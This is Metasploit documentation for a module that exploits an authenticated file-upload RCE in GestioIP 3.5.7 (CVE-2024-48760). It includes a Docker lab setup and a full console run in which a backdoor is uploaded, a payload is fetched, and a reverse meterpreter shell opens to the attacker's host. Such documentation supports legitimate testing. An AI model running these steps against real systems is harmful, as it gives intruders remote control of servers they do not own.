ContextQMD
Back to Metasploit Framework

Gestioip Rce

documentation/modules/exploit/multi/http/gestioip_rce.md

6.4.1337.7 KB
Original Source

Vulnerable Application

GestioIP is a web-based, automated IP address management (IPAM) software.

Description

This module exploits an Remote Code Execution (RCE) vulnerability in GestioIP 3.5.7. This vulnerability is tracked as CVE-2024-48760. It is caused by an unsafe upload script file that allows an authentificated user with admin rights on the website to overwrite the script file (/api/upload.cgi) with a backdoor file.

Testing

Setup environment

To quickly set up a vulnerable environment for testing, we are gonna get a docker compose setup with the right version from github and run it.

  1. Get the Docker Compose setup from GitHub :
bash
wget https://github.com/muebel/gestioip-docker-compose/archive/main.zip
unzip main.zip
rm main.zip
mv gestioip-docker-compose-main gestioip-docker-compose

This setup init two docker containers, one with the vulnerable version of GestioIP and one with a MySQL database.

  1. Run the docker setup, make sure you have docker, docker compose installed and that your 80 port is free or edit the .env file:
bash
$ docker-compose up -d

Expected result:

bash
$ docker ps
CONTAINER ID   IMAGE                    COMMAND                  CREATED       STATUS       PORTS                  NAMES
88b10cf6ffb8   gestioip/gestioip:3555   "/gestioip_install/s…"   1 hours ago   Up 1 hours   0.0.0.0:80->80/tcp   gip
0d5efce2dfa7   mysql:5                  "docker-entrypoint.s…"   1 hours ago   Up 1 hours   3306/tcp, 33060/tcp    gip-mysql

The web application is now available on http://locahost or http://<CONTAINER_IP>. You can log in with the default credentials gipadmin:PASSWORD or change them in the .env file.

Options

This module requires an authentificated user with admin rights on the website to be able to upload the backdoor file.

USERNAME (required)

The username of the target user with admin right to authenticate with.

PASSWORD (required)

The password of the target user with admin right to authenticate with.

Verification Steps

  1. Start msfconsole
  2. Do: use gestioip_rce
  3. Do: set USERNAME <USERNAME>
  4. Do: set PASSWORD <PASSWORD>
  5. Do: set RHOSTS <TARGET_IP>
  6. Do: set LHOST <YOUR_IP>
  7. Do: set LPORT <YOUR_PORT>
  8. Do: set FETCH_COMMAND <FETCH_COMMAND> (optional, default is WGET, CURL supported)
  9. Do: check
  10. Do: run
  11. You should get a meterpreter session.

Scenarios

bash
./msfconsole
msf >  use gestioip_rce

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  exploit/multi/http/gestioip_rce  2025-01-14       normal  Yes    GestioIP 3.5.7 Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/gestioip_rce

[*] Using exploit/multi/http/gestioip_rce
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/gestioip_rce) > set PASSWORD PASSWORD
PASSWORD => PASSWORD
msf exploit(multi/http/gestioip_rce) > set LHOST 10.20.0.1
LHOST => 10.20.0.1
msf exploit(multi/http/gestioip_rce) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/gestioip_rce) > set RHOSTS 10.20.0.2
RHOSTS => 10.20.0.2
msf exploit(multi/http/gestioip_rce) > show options

Module options (exploit/multi/http/gestioip_rce):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  PASSWORD         yes       The password to auth with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: http, socks4, socks5, sapni, socks5h
   RHOSTS    10.20.0.2        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     80               yes       The target port (TCP)
   SRVSSL    false            no        Negotiate SSL/TLS for local server connections
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  gipadmin         yes       The username to auth as with admin right
   VHOST                      no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.

Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Acce
                                              pted: none, python3.8+, shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           10.20.0.1        yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      WfVcyBXPYscJ     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux/unix Command



View the full module info with the info, or info -d command.
msf exploit(multi/http/gestioip_rce) > check
[*] Checking if the target is reachable...
[+] 10.20.0.2:80 - The target is vulnerable. File upload successful, the target is vulnerable GestioIP
msf exploit(multi/http/gestioip_rce) > run
[*] Started reverse TCP handler on 10.20.0.1:4444 
[*] Upload the backdoor file ...
[+] Backdoor file successfuly upload
[*] Executing payload on the target server ...
[*] Sending stage (3090404 bytes) to 10.20.0.2
[*] Cleaning up backdoor file on target server ...
[*] Meterpreter session 1 opened (10.20.0.1:4444 -> 10.20.0.2:55726) at 2026-03-11 10:06:46 +0100
[+] Payload successfully executed

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : a1706469c90a
OS           : Ubuntu 20.04 (Linux 6.17.0-12-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux